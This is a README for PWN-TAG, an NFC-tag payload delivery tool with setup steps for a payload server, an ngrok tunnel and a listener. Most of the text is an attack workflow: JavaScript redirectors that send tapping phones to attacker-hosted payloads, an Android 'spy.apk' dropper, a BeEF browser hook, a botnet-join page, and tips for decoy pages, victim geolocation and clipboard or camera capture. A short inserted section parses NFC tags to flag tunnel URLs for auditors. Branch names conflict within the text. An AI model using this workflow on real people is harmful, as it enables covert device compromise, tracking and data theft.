# PWN-TAG OG: this version works best for non-paid ngrok accounts
---
# There are 2 branches in this repository:
- The main branch does not offer zero-click payload delivery, because it does not use a paid ngrok account.
- The pwn_tag_pro branch allows Android zero-click payload delivery with a paid ngrok account.

MAKE SURE YOU ARE IN THE RIGHT BRANCH OF THE REPOSITORY BEFORE PROCEEDING. The toggle to switch branches is found above.
---
PWN TAG _"tag to pwn"_ — NFC payload delivery system for social engineering, red team ops, and mobile testing.
PWN-TAG lets you write NFC tags that trigger live payloads on mobile devices — from fingerprinting to botnet enrollment. Built for ethical hackers, educators, defenders, and curious minds.
---
## Branches
| Branch | Purpose |
|----------------|-------------------------------------------------------------------------|
| `main` | Free-tier version using randomized ngrok URLs (requires tap + confirm) |
| `ngrok-pro` | Paid ngrok version with static subdomains → enables **zero-click** payloads |
Switch branches like this:
```bash
git checkout ngrok-pro
```
---
## What You Need
* NFC tag stickers (~$10 for 25):
[https://a.co/d/gl2XRV8](https://a.co/d/gl2XRV8)
* NFC writer app (free):
[https://apps.apple.com/app/id1252962749](https://apps.apple.com/app/id1252962749)
* A Debian-based Linux system
* A [ngrok](https://ngrok.com/) account (free or paid)
---
## Installation (Clone + Setup)
```bash
git clone https://github.com/ekomsSavior/PWN-TAG.git
cd PWN-TAG
```
(Optional) Switch to the pro version for static subdomain support:
```bash
git checkout ngrok-pro
```
Install Python dependencies:
```bash
sudo apt update
sudo apt install python3 python3-pip -y
pip3 install flask
```
## ngrok Setup
```bash
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar -xvzf ngrok-v3-stable-linux-amd64.tgz
sudo mv ngrok /usr/local/bin/
```
Then authenticate your token: [https://ngrok.com/](https://ngrok.com/)
```bash
ngrok config add-authtoken <YOUR_NGROK_AUTH_TOKEN>
```
---
## Usage (4 Terminal Workflow)
### Terminal 1 — Start Payload Server
```bash
python3 -m http.server 8080
```
This serves your payloads at `http://localhost:8080`
---
### Terminal 2 — Start ngrok Tunnel
```bash
ngrok http 8080
```
Copy the `https://...ngrok.app` URL — this becomes your **NFC tag link**.
---
### Terminal 3 — Edit Payload Redirector
```bash
nano payloads/test_shell.html
```
Update this line with your current ngrok URL:
```javascript
window.location.href = "https://your-ngrok-subdomain.ngrok.app/payloads/bot_joiner.html";
```
---
### Terminal 4 — Start Listener
```bash
python3 listener.py
```
Logs any device fingerprinting or interaction data sent by payloads.
---
## Write Your NFC Tag
Using your NFC writer app:
1. Tap **Write**
2. Add Record → **URL**
3. Paste something like:
```
https://pwn-tag.ngrok.app/payloads/test_shell.html
```
4. Tap “Write” to encode it
Now when someone taps the tag, it opens the redirector → logs the device → delivers your payload.
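
For anyone auditing tags found on site or during an assessment: the URL record written above is an NDEF URI record, which can be decoded and checked against tunnel-service domains before any phone taps it. This is an added example, not part of PWN-TAG; the suffix list beyond `ngrok.app` and the sample tag bytes are constructed assumptions.

```python
from urllib.parse import urlsplit

# NFC Forum URI record abbreviation codes (first payload byte); subset only.
URI_PREFIXES = {0x00: "", 0x01: "http://www.", 0x02: "https://www.",
                0x03: "http://", 0x04: "https://", 0x05: "tel:", 0x06: "mailto:"}
# Tunnel-service suffixes to flag. ngrok.app is the domain this README uses;
# the other entries are assumptions, adapt the list to your own policy.
TUNNEL_SUFFIXES = ("ngrok.app", "ngrok-free.app", "ngrok.io")

def parse_uri_records(msg: bytes) -> list[str]:
    """Return the URIs in well-known 'U' records of an NDEF message."""
    uris, pos = [], 0
    while pos < len(msg):
        header = msg[pos]
        short, has_id, tnf = header & 0x10, header & 0x08, header & 0x07
        type_len = msg[pos + 1]
        pos += 2
        if short:                      # SR flag: 1-byte payload length
            payload_len = msg[pos]
            pos += 1
        else:                          # otherwise 4-byte big-endian length
            payload_len = int.from_bytes(msg[pos:pos + 4], "big")
            pos += 4
        id_len = 0
        if has_id:                     # IL flag: an ID length byte follows
            id_len = msg[pos]
            pos += 1
        rec_type = msg[pos:pos + type_len]
        pos += type_len + id_len
        payload = msg[pos:pos + payload_len]
        if len(payload) != payload_len:
            raise ValueError("truncated NDEF record")
        pos += payload_len
        if tnf == 0x01 and rec_type == b"U" and payload:
            prefix = URI_PREFIXES.get(payload[0], "")  # unlisted codes: no prefix
            uris.append(prefix + payload[1:].decode("utf-8", "replace"))
        if header & 0x40:              # ME flag: last record of the message
            break
    return uris

def is_tunnel_url(uri: str) -> bool:
    """True when the URI's host is a tunnel suffix or a subdomain of one."""
    host = (urlsplit(uri).hostname or "").lower()
    return any(host == s or host.endswith("." + s) for s in TUNNEL_SUFFIXES)

# Constructed sample: a single short URI record holding the README's example URL.
SAMPLE_URI = b"pwn-tag.ngrok.app/payloads/test_shell.html"
SAMPLE_TAG = bytes([0xD1, 0x01, len(SAMPLE_URI) + 1]) + b"U\x04" + SAMPLE_URI
if __name__ == "__main__":
    for uri in parse_uri_records(SAMPLE_TAG):
        print("FLAG" if is_tunnel_url(uri) else "ok  ", uri)
```

Feed it the raw NDEF message bytes exported from a tag reader; a flagged tag should be pulled and the URL looked up in proxy or DNS logs.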
---
## Payload Options (Examples & Use Cases)
| Payload | Path | Description |
| --------------------- | -------------------------- | ------------------------------------------------------------------- |
| **Test Shell** | `payloads/test_shell.html` | Logs fingerprint (user agent, screen size, timezone) then redirects |
| **Full Beacon Shell** | `payloads/beef_shell.html` | Loads a BeEF hook for browser control (if server is running)        |
| **APK Dropper** | `payloads/spy.apk` | Sends Android users a direct APK (custom implants welcome) |
| **Rogue Joiner** | `payloads/bot_joiner.html` | Simulates Rogue Botnet join — connect, beacon, execute JS |
---
## Swapping Payloads (Beginner-Friendly)
1. Open `payloads/test_shell.html`
2. Change this line:
```javascript
window.location.href = "https://your-ngrok.ngrok.app/payloads/YOUR_FILE_HERE";
```
3. Example:
```javascript
window.location.href = "https://pwn-tag.ngrok.app/payloads/spy.apk";
```
No need to rewrite the NFC tag if you're using a static domain — just update the file.
---
## Pro Tips
* Make multiple redirectors (`redirect_to_apk.html`, etc.)
* Make `index.html` a 403 decoy or fake blog
* Want geolocation? Use `https://ipinfo.io/json` in your JS
* Want deep traps? Chain to `clipboard.js`, `camlog`, etc. before redirect
* With static domains (`ngrok-pro`), your NFC tags are reusable forever
---
## Ethical Usage
This tool is intended for **educational purposes, red-team ops, and ethical testing only**.
You are responsible for your actions. Do not use this on devices or individuals without consent.
---
## License
MIT License
Copyright (c) 2026 ek0mssavi0r
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
USE AT YOUR OWN RISK. NO WARRANTY PROVIDED.